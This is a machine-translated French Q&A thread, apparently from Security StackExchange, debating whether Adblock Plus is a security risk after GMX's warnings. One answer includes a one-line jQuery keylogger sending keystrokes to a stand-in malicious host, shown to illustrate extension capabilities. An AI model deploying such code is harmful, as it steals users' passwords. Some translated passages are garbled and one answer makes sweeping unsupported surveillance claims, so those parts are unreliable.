web-dev-qa-db-fra.com

Adblock (Plus) représente-t-il un risque pour la sécurité?

Site Web de mon fournisseur de messagerie (http://www.gmx.de) a récemment commencé à créer un lien vers le site (allemand) http://www.browsersicherheit.info/ qui prétend essentiellement qu'en raison de ses capacités à modifier l'apparence d'un site, Adblock Plus (et d'autres) pourrait en fait être utilisé à des fins de phishing. Voici une citation de ce site et sa traduction:

Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und können diese auch an Dritte weitergeben - auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

traduit:

Ces extensions peuvent accéder à toutes les entrées de votre navigateur et peuvent également les transmettre à des tiers - même votre mot de passe bancaire. Cela peut se produire sur tous les sites Web. Les mécanismes de sécurité tels que SSL ne peuvent pas éviter cela.

Ok, ils mentionnent d'autres addons (assez évidemment des crapwares), mais Adblock Plus est-il vraiment une menace pour la sécurité ou les opérateurs de ce site profitent-ils simplement de l'occasion pour essayer de faire peur aux utilisateurs inexpérimentés de revoir leurs annonces?

167
Tobias Kienzler

Ce n'est pas le cas. Il s'agit d'une campagne FUD ( peur, incertitude et doute ) de GMX car ils veulent afficher leur les publicités. Il n'y a absolument aucun risque pour la sécurité des bloqueurs de publicités mentionnés. Ils ont ajouté du crapware à la liste pour la rendre plus légitime.

Bien sûr, de telles campagnes sont très inhabituelles, en particulier d'une entreprise aussi grande et bien connue que GMX. Malheureusement, je n'ai pas de source anglaise à portée de main (car c'est une campagne uniquement en allemand) mais puisque vous parlez allemand, vous voudrez peut-être lire cet article sur heise.de .

Mise à jour # 1: United Internet, la société derrière GMX, a reçu de nombreuses critiques pour avoir induit les clients en erreur en prétendant à tort qu'il y avait un risque pour la sécurité de leur PC. Le Wall Street Journal (édition allemande) a nommé les avertissements affichés sur GMX et le site qu'ils relient à une "campagne de peur".

Mise à jour # 2: GMX dit maintenant qu'ils n'afficheront plus le lien lorsque vous utilisez des bloqueurs de publicités mais l'afficheront toujours si vous utilisez du crapware qui injecte des publicités, la liste sur le site http://www.browsersicherheit.info/ a été mis à jour en conséquence et ne répertorie désormais qu'une petite collection de crapware. Cette liste n'est en aucun cas complète, donc ce n'est pas une source fiable lorsque vous voulez savoir si votre navigateur a installé du crapware. Cependant, United Internet maintient sa position selon laquelle ils ne veulent pas que les utilisateurs qui visitent leurs sites utilisent des bloqueurs de publicités et a déclaré qu'ils développeront d'autres méthodes anti-blocage à l'avenir ( source allemande ).

224
Andalur

Mise à jour

Après y avoir réfléchi, je suis d'accord avec les autres réponses en ce que, malgré le fait qu'il PEUT accéder à vos données, Adblock est plus susceptible de protéger votre vie privée que de l'envahir. Le vrai risque est malveillant des annonces vous invitant à installer des logiciels sur votre ordinateur. Adblock les empêche.

Voici la réponse originale et prudente:

Oui, c'est tout à fait ça.

Adblock Plus est une extension/add-on de navigateur développée par un développeur indépendant. Adblock peut accéder au DOM (modèle d'objet document) sur toutes les pages.

Le fonctionnement d'AdBlock est qu'il injecte un script dans votre navigateur, qui recherche le DOM, puis exécute une fonction hide() sur ce qu'il détermine être des annonces.

Cela signifie qu'AdBlock (et toute extension Chrome avec cette autorisation) peut accéder à votre DOM. Adblock ne peut pas accéder aux variables JavaScript.

Qu'est-ce que ça veut dire?

Si vous êtes sur un site Web avec authentification sécurisée et qu'il existe un objet JavaScript avec quelque chose de privé comme une clé AuthKey, vous êtes sûr. AdBlock ne peut pas accéder aux variables JavaScript.

Cependant, AdBlock PEUT exécuter un code équivalent à cela.

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

Qui acheminera essentiellement toutes les touches sur lesquelles vous appuyez vers un serveur distant.

Cela peut être utilisé pour voler votre mot de passe, ce qui est encore pire que de voler votre jeton.

Cela étant dit, AdBlock lui-même est-il dangereux?

Il me semble que AdBlock n'est pas trop dangereux car le développeur s'est identifié et il est utilisé par des millions de personnes. S'il faisait le genre de ruse comme ci-dessus, quelqu'un aurait probablement remarqué et sifflé.

Mais ne pensez pas que les extensions Chrome sont totalement sûres. Toutes peuvent voler des données, ainsi que d'autres éléments malveillants.

Que puis-je faire d'autre?

A Chrome peut également effectuer les violations de sécurité suivantes de manière assez triviale ...

  • Acheminez le contenu de tout e-mail ou page que vous lisez vers une source tierce (si cet e-mail contient des informations de connexion non cryptées, vous êtes bloqué) Si vous pouvez le voir à l'écran, tout Chrome Chrome = Extension, aucune question posée.
  • Entrez des informations dans un champ et appuyez sur le bouton Soumettre, par exemple, envoyez un e-mail
  • Si vous laissez votre navigateur ouvert et que l'extension sait comment, il peut utiliser votre interface de messagerie (Gmail, Outlook) pour envoyer un e-mail de son choix à vos contacts. C'est trivial.
  • Modifiez le script associé à n'importe quel bouton, s'il a été initialement inséré avec jQuery. Par exemple, le bouton qui envoie vos informations de connexion au serveur peut être légèrement modifié pour envoyer ces informations à la fois au serveur et à http://mymaliciousserver. C'est trivial.

Mise à jour

Il a été vérifié lors de discussions que AdBlock est open source. Cela devrait vous permettre de faire davantage confiance à AdBlock, mais n'oubliez pas qu'il est toujours capable de faire ces choses. J'ai examiné la source et je peux affirmer sans risque que je n'ai aucune idée de ce qui se passe.

Source: Je suis un développeur JavaScript et Chrome Extension.

110
Code Whisperer

Cela revient vraiment à une question de confiance. Il est vrai qu'aujourd'hui, l'extension AdBlock est sûre. Nous savons qu'il ne volera pas vos données, même si, comme le soulignent autres réponses , il a la capacité technique de le faire.

Cependant, les extensions Chrome sont mises à jour en silence et automatiquement.

Êtes-vous convaincu que le développeur de l'extension AdBlock n'ajoutera pas de code malveillant? Personnellement, avec des millions d'utilisateurs, un code malveillant serait rapidement remarqué et serait sans aucun doute un tueur de carrière pour le développeur.

Même si vous faites confiance au développeur, il existe encore des scénarios improbables qui pourraient vous exposer:

Pour le paranoïaque, ces problèmes pourraient être atténués par:

Ainsi, bien qu'il soit intellectuellement malhonnête de dire "non, il n'y a aucun risque", le risque est complètement exagéré par GMX. Tout comme je fais confiance à Google pour me donner un navigateur qui ne vole pas mes données personnelles, je fais confiance au développeur AdBlock pour me donner une extension qui ne vole pas mes données.

Le risque que l'extension soit mise à jour avec du code malveillant est suffisamment petit pour que je ne m'en inquiète pas, et si j'avais le moindre souci, il est assez facile de désactiver l'extension.

54
josh3736

Tous les logiciels présentent un risque pour la sécurité, mais dans ce cas, leur affirmation est trompeuse.

Tout comme tous les conseils sont potentiellement mauvais et toutes les transactions sont potentiellement frauduleuses. "Risque" signifie simplement que votre sécurité n'est pas garantie, ce qui est vrai dans 100% des cas.

Mais dans le cas d'AdBlock Plus, le logiciel est bien compris et développé par une équipe qui a la réputation de protéger les intérêts de ses utilisateurs. De plus, c'est open-source, donc le le code source est disponible pour que vous puissiez vous examiner pour tout problème de sécurité. Donc dans ce cas, le risque est minime; trivial même.

Au lieu de cela, GMX utilise un truisme ("le logiciel est toujours risqué") pour suggérer que le logiciel ceci est dangereux, ce qui est trompeur au mieux, et peut-être diffamatoire. C'est comme un propriétaire de restaurant distribuant des tracts disant que ses concurrents pourraient empoisonner leur propre nourriture. Techniquement, c'est vrai, puisque vous avez dit "pourrait être" au lieu de " sont ", mais l'action est néanmoins fondamentalement malhonnête.

42
tylerl

Juste une observation - j'ai tendance à promouvoir les bloqueurs de publicités en particulier pour mes amis et associés moins avertis - précisément parce que cela réduit les menaces de sécurité. Comment? Parce qu'une grande partie du contenu le plus malveillant sur le Web se présente sous la forme d'une publicité trompeuse comme "cliquez ici pour rendre votre PC plus rapide" ... Ceux-ci disparaissent en grande partie avec un bloqueur de publicité.

20
Wyrmwood

Adblock (comme d'autres extensions et, d'ailleurs, les développeurs de navigateurs) a la capacité technique d'obtenir beaucoup de vos données, et vous avez tous les risques généralement associés à l'exécution d'applications tierces - à savoir, que le fournisseur peut être malveillant, et il peut y avoir des bogues dans leur logiciel qui brisent votre sécurité.

Cela étant dit, je considérerais AdBlock comme défense contre le phishing. Beaucoup de logiciels douteux sont envoyés aux utilisateurs par le biais d'annonces se faisant passer pour autre chose - c'est-à-dire qu'un site propose un élément qu'un utilisateur veut, mais a une annonce qui ressemble à un bouton de téléchargement, et fournit un produit publicitaire/malware au lieu du contenu réel sur le site, et un tel malware téléchargé "accidentellement" est un sérieux risque pour la sécurité. De même, il y a eu des incidents d'attaques massives de consommateurs en exécutant une bannière publicitaire contenant un exploit zeroday, ce qui ferait apparaître l'exploit sur des sites respectés et de confiance.

Pour les pratiques de sécurité à l'échelle de l'entreprise, il peut être judicieux d'exiger AdBlock et de l'installer par défaut sur chaque poste de travail, car il est particulièrement utile pour protéger les utilisateurs inexpérimentés qui ne l'installeraient pas eux-mêmes. Cela entraînerait un risque en faisant confiance à un produit logiciel de plus, mais serait un net positif pour la sécurité quotidienne.

9
Peteris

La manière dont cette information est diffusée par United Internet est trompeuse (je m'efforce d'éviter de dire "diffamation"). L'allégation telle qu'elle se présente est manifestement erronée par tous les moyens objectifs et la présentation est diffamatoire.

Bien sûr, en principe, il faut admettre que Adblock (Plus) est bien sûr un risque de sécurité potentiel. Que ce risque justifie une préoccupation raisonnable est une autre chose.

Adblock (Plus) pourrait être un risque pour la sécurité pour trois raisons:

  1. Il s'agit d'un logiciel qui s'exécute sur votre ordinateur, qui pourrait, comme tous les logiciels, fait en principe presque n'importe quoi. Y compris la présentation de fausses informations ou le vol de vos données.
  2. Il fait modifie le contenu de la page Web, c'est à cela que sert le blocage des publicités. Certes, un logiciel qui est bien conn pour modifier le contenu des pages Web pourrait modifier le contenu de manière malveillante et passer inaperçu beaucoup plus facilement qu'un autre logiciel.
  3. Il effectue cette tâche en faisant correspondre une liste téléchargeable d'expressions régulières à partir d'une gamme de tiers (non contrôlés/inconnus), tels que EasyList

Donc, si vous êtes en mode ultra-paranoïa, vous pourriez craindre que quelqu'un chez EasyList (ou un autre fournisseur de liste de filtres) modifie la liste de filtres afin qu'il fasse quelque chose de malveillant, ou qu'un pirate pirate le site. Votre module Adblock Plus téléchargerait vraisemblablement la liste malveillante lors de sa mise à jour quotidienne/hebdomadaire sans le savoir et sans moyen de vérification (il existe une somme de contrôle qui peut être intégrée, mais cela ne protège que contre la corruption accidentelle, pas la modification malveillante).
En conséquence, une telle liste de blocs malveillants pourrait en théorie, l'addon fait des "choses mauvaises".

Heureusement, à part les exploits JS, il n'y a pas trop de mal qui pourrait de manière réaliste être fait via ce vecteur d'attaque en raison de la façon dont Adblock fonctionne (il correspondra à une expression rationnelle arbitraire, mais il gagné 't do substitutions arbitraires, donc cacher certains éléments qu'il ne devrait pas cacher ou laisser passer certaines publicités est à peu près le pire des cas).
D'un autre côté, un exploit JS pourrait être utilisé contre vous sans que Adblock Plus ne s'exécute en premier lieu.

De plus, évidemment, comme tout logiciel tiers (y compris Firefox ou Chrome lui-même!), L'addon Adblock Plus lui-même pourrait voler vos données. Tout ce que vous pouvez dire à l'heure actuelle le temps est que jusqu'à présent cela ne s'est pas produit.
Là encore, presque tous les grands acteurs commerciaux de l'entreprise font des choses non fiables sur une base quotidienne, contre laquelle personne ne s'oppose.

Maintenant, vous devez vous demander quelle est la probabilité qu'Adblock Plus en effet vole des données utilisateur, et quelle est la probabilité qu'une telle chose ne soit pas détectée pendant plus d'un jour ou deux sur un système largement déployé projet open source.

Franchement, si vous pensez que c'est une menace sérieuse et réaliste qui est susceptible de vous affecter, alors vous devez également croire que Microsoft en collaboration avec le NSA déjà crée une fonctionnalité de vol d'identité directement dans Windows et que chaque ordinateur possède un "kill switch" secret que le DoD américain peut activer à volonté (cela aussi est en principe possible, et c'est en fait plus probablement pour être vrai que l'auteur d'Adblock volant vos économies).

Vous ne devez pas non plus faire confiance à GMX dans ce cas, car ils volonté (notez le libellé, volonté, pas peut) partagent toutes vos données personnelles et traitez les informations de manière malveillante et contraire à l'éthique avec d'autres parties (au moins avec les agences américaines, en raison du traité de Schröder de 2001, mais vous n'avez aucun moyen de dire avec qui d'autre).
Vous ne devriez pas non plus faire confiance à 1 & 1 (un autre membre de United Internet) car ils vont partager vos données personnelles avec qui-sait-qui (étant une entreprise américaine). Ni Google, ni l'autre moitié d'Internet d'ailleurs.

D'un autre côté, Adblock Plus a manifestement empêché l'installation de logiciels malveillants sur les ordinateurs des utilisateurs dans le passé.

8
Damon

Les autres réponses oublient de mentionner le problème en dehors de la confiance: ce bloc publicitaire modifie les pages que vous visitez. Cela et avoir besoin de faire confiance à plus de développeurs est la raison pour laquelle je n'ai jamais utilisé de plugins de logiciel/navigateur de blocage des publicités, et je le déconseille fortement.

Il est bien connu que les sites Web dépendent de toutes sortes d'invariants fragiles pour leur sécurité. Par exemple, regardez simplement comment le détournement de clics a été traité dans le passé. Rien n'empêche adblock de violer par erreur un invariant dont le site dépend pour des raisons de sécurité.

De plus, adblock et d'autres logiciels de blocage des publicités réduisent l'anonymat. Un adversaire peut soit vous faire exécuter du code pour parcourir l'arborescence DOM et rechercher les parties/modifications manquantes, soit observer passivement que vous ne faites pas certaines demandes pour récupérer du contenu lié aux annonces (dont certaines peuvent être hébergées sur le site lui-même, ce qui en fait un possible adversaire).

3
Longpoke

Personne n'a mentionné ici que Adblock plus ainsi que presque tous les autres navigateurs et extensions peuvent être mis à jour à distance. Cela signifie qu'il doit y avoir une porte dérobée dans le programme même s'il est verrouillé sur des URL de mise à jour "dignes de confiance" spécifiques. Cela pourrait être interprété comme un logiciel espion, mais le logiciel espion est un terme quelque peu abstrait.

Il est vrai que la plupart des gens ont dit que ce n'était pas sûr car il avait les autorisations pour lire et envoyer des données bien qu'il soit largement admis qu'Adblock plus en particulier n'est pas malveillant. Bien qu'ils soient pour la plupart open source (Adblock inclus), les logiciels de navigation et les extensions ne sont aussi sûrs que les URL de mise à jour pour lesquelles il n'y a aucun moyen de savoir à quel point elles sont réellement sécurisées car le code de ces services est distant et donc inaccessible.

Évidemment, aucun logiciel ou serveur ne peut être sécurisé à 100% en raison de l'entropie et de la présence d'utilisateurs, mais pour obtenir la sécurité la plus élevée possible, vous devez étudier le code source, toujours construire à partir de la source et désactiver la mise à jour automatique. Comme avec tous les logiciels, les navigateurs et les extensions ne sont aussi sécurisés que par l'utilisateur.

2
tpbapp